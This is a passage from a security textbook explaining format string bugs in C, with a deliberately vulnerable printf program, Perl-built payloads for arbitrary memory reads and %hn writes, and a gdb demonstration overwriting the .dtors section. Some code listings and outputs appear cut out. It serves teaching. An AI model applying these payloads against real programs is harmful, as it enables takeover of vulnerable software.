13.7 Format String Bugs

Buffer overflows aren't the only type of bug that can control a process. Another fairly common programming error is the situation in which a user can control the format parameter to a function, such as printf( ) or syslog( ). These functions take a format string as a parameter that describes how the other parameters should be interpreted.

For example, the string %d specifies that a parameter should be displayed as a signed decimal integer, while %s specifies that a parameter should be displayed as an ASCII string. Format strings give you a lot of control over how data is to be interpreted, and this control can sometimes be abused to read and write memory in arbitrary locations.

13.7.1 Reading Adjacent Items on the Stack

Example 13-11 shows a vulnerable C program, much like the printme program in Example 13-1.

Example 13-11. A simple C program containing a format string bug
int main(int argc, char *argv[])


    if(argc < 2)


        printf("You need to supply an argument\n");

        return 1;



    return 0;


The program displays user-supplied input by using printf( ). Here is what happens when you supply normal data and a format specifier to the program:

# ./printf "Hello, world!"

Hello, world!

# ./printf %x


If you supply the %x format specifier, printf( ) displays the hexadecimal representation of an item on the stack. The item printed is, in fact, the address of what would be the second argument passed to printf( ) (if one was supplied). Since no arguments are passed, printf( ) reads and prints the 4-byte word immediately above the format string on the stack. Figure 13-17 shows how the stack should look if a valid second argument is passed.

Figure 13-17. The printf( ) function's stack frame

Next, Figure 13-18 shows what the stack really looks like, as only one argument is passed in this case (the pointer to the format string).

Figure 13-18. The second argument doesn't really exist

printf( ) takes the next 4-byte word above the pointer to the format string and prints it, assuming it to be the second argument. If you use a number of %x specifiers, printf( ) displays more data from the stack, progressively working upwards through memory:

# ./printf %x.%x.%x.%x



So far, you can read as much of the stack above the printf( ) stack frame as you like. Next, I'll show how you can extend this ability to read from anywhere, write to anywhere, and redirect execution to wherever you choose.

13.7.2 Reading Data From any Address on the Stack

In most cases, the buffer containing your format string is located on the stack. This means that it's located somewhere in memory not too far above the printf( ) stack frame and first argument. This also means that you can use the contents of the buffer as arguments to printf( ). Example 13-12 shows the string ABC, along with 55 %x specifiers, being passed to the vulnerable program.

Example 13-12. Using Perl to provide 55%x specifiers
# ./printf ABC`perl -e 'print "%x." x 55;'`







In the example, you place ABC into a buffer (as a local variable in the main( ) stack frame) and look for it by stepping through the 55 words (220 bytes) above the first argument to printf( ). Near the end of the printed values is a string 43424100 (hexadecimal encoding of "CBA" along with the NULL terminator). This all means that by using arguments 51 and onwards, you can access values entirely under your control, and use them as parameters to other format specifiers (such as %s). Figure 13-19 shows the main( ) and printf( ) strack frames during this %x reading attack.

Figure 13-19. Reading data from further up the stack

You can use this technique to read data from any memory address by instructing printf( ) to read a string pointed to by its fifty-third argument (in part of the main( ) buffer you control). You can place the address of the memory you wish to read and use the %s printf( ) specifier to display it.

You can use direct parameter access to tell printf( ) which argument you want to associate with a particular format specifier. % is a standard format specifier that tells the function to print the next string on the stack. A specifier using direct parameter access looks like %7$s; it instructs printf( ) to print the string pointed to by its seventh argument.

After a little experimentation, you will discover that the end of the buffer is equivalent to the fifty-third argument, so the format string needs to look like this:

%53$s(padding)(address to read)

%53$s is the format specifier telling printf( ) to process the value at the fifty-third argument. The padding is needed to ensure that the address lies on an even word boundary, so that it may be used as an argument by printf( ).

In this case, I will try to read part of the example program environment string table. I know the stack on my test system lives around address 0xbffff600, so I will try reading the string at address 0xbffff680. The following format string is passed:


%53$s is the format specifier that tells printf( ) to process the value at the fifty-third argument. That argument is 0xbffff680 (aligned to an exact word by the AA padding), which in turn, points near the beginning of the stack (where environment variables and such are defined).

Note that the memory address is reversed (in little endian format). Because this buffer contains some nonprintable characters, it is easiest to generate it with something like Perl. Here's what happens when I pass this string to the vulnerable program:

# ./printf `perl -e 'print "%53\$s" . "AA" . "\x80\xf6\xff\xbf"';`



The string at 0xcfbfd680 is displayed by the %s specifier. This is the TERM environment variable used by the program, followed by the AA padding and unprintable memory values. You can use this technique to display any value from memory.

13.7.3 Overwriting Any Word in Memory

To write to arbitrary memory locations using format strings, use the %n specifier. The printf(3) Unix manpage gives some insight into its use:

n     The number of characters written so far is stored into the

      integer indicated by the int * (or variant) pointer argument.

      No argument is converted.

By supplying a pointer to the memory you wish to overwrite and issuing the %n specifier, you write the number of characters that printf( ) has written so far directly to that memory address. This means that in order to write arbitrary memory to arbitrary locations, you have to be able to control the number of characters written by printf( ).

Luckily, the precision parameter of the format specifier allows you to control the number of characters written. The precision of a format specifier is provided in the following manner:


To write 20 characters, use %.020x. Unfortunately, if you provide a huge field width (e.g., 0xbffff0c0), printf( ) takes a very long time to print all the zeroes. It is more efficient to write the value in 2 blocks of 2 bytes, using the %hn specifier, which writes a short (2 bytes) instead of an int (4 bytes).

If more than 0xffff bytes have been written, %hn writes only the least significant 2 bytes of the real value to the address. For example, you can just write 0xf0c0 to the lowest 2 bytes of your target address, then print 0xbfff - 0xf0c0 = 0xcf3f characters, and write again to the highest two bytes of the target address.

Putting all this together, here's what the final format string must look like to overwrite an arbitrary word in memory:

%.0(pad 1)x%(arg number 1)$hn%.0(pad 2)x%(arg number 2)

$hn(address 1)(address 2)(padding)

in which:

  • pad 1 is the lowest two bytes of the value you wish to write.

  • pad 2 is the highest two bytes of value, minus pad 1.

  • arg number 1 is the offset from the first argument to address 1 in the buffer.

  • arg number 2 is the offset from first argument to address 2 in the buffer.

  • address 1 is the address of lowest two bytes of address you wish to overwrite.

  • address 2 is address 1 + 2.

  • padding is between 0 and 4 bytes, to get the addresses on an even word boundary.

A sound approach is to overwrite the .dtors section of the vulnerable program with an address you control. The .dtors (destructors) section contains addresses of functions to be called when a program exits, so if you can write an address you control into that section, your shellcode will be executed when the program finishes.

Example 13-13 shows how to get the address of the start of the .dtors section from the binary using objdump.

Example 13-13. Using objdump to identify the .dtors section
# objdump -t printf | grep \.dtors

08049540 l    d  .dtors 00000000

08049540 l     O .dtors 00000000         __DTOR_LIST_  _

08048300 l     F .text  00000000         _  _do_global_dtors_aux

08049544 l     O .dtors 00000000         __DTOR_END_  _

Here, the .dtors section starts at 0x08049540. I will overwrite the first function address in the section, 4 bytes after the start, at 0x8049544. I will overwrite it with 0xdeadbeef for the purposes of this demonstration, so that the format string values are as follows:

  • pad 1 is set to 0xbeef (48879 in decimal).

  • pad 2 is set to 0xdead - 0xbeef = 0x1fbe (8126 in decimal).

  • arg number 1 is set to 114.

  • arg nunber 2 is set to 115.

  • address 1 is set to 0x08049544.

  • address 2 is set to 0x08049546.

The assembled format string is as follows:


Example 13-14 shows how, by using Perl through gdb, you can analyze the program crash because the first value in the .dtors section is overwritten with 0xdeadbeef.

Example 13-14. Using gbd to analyze the program crash
# gdb ./printf

GNU gdb 4.16.1

Copyright 1996 Free Software Foundation, Inc.

(gdb) run `perl -e 'print "%.048879x" . "%114\$hn" . "%.08126x" .

 "%115\$hn" . "\x44\x95\x04" . "\x08\x46\x95\x04\x08" . "A"';`







Program received signal SIGSEGV, Segmentation fault.

0xdeadbeef in ?? ( )

13.7.4 Recommended Format String Bug Reading

If you would like more information about the various techniques that can exploit format string bugs, I recommend the following online papers: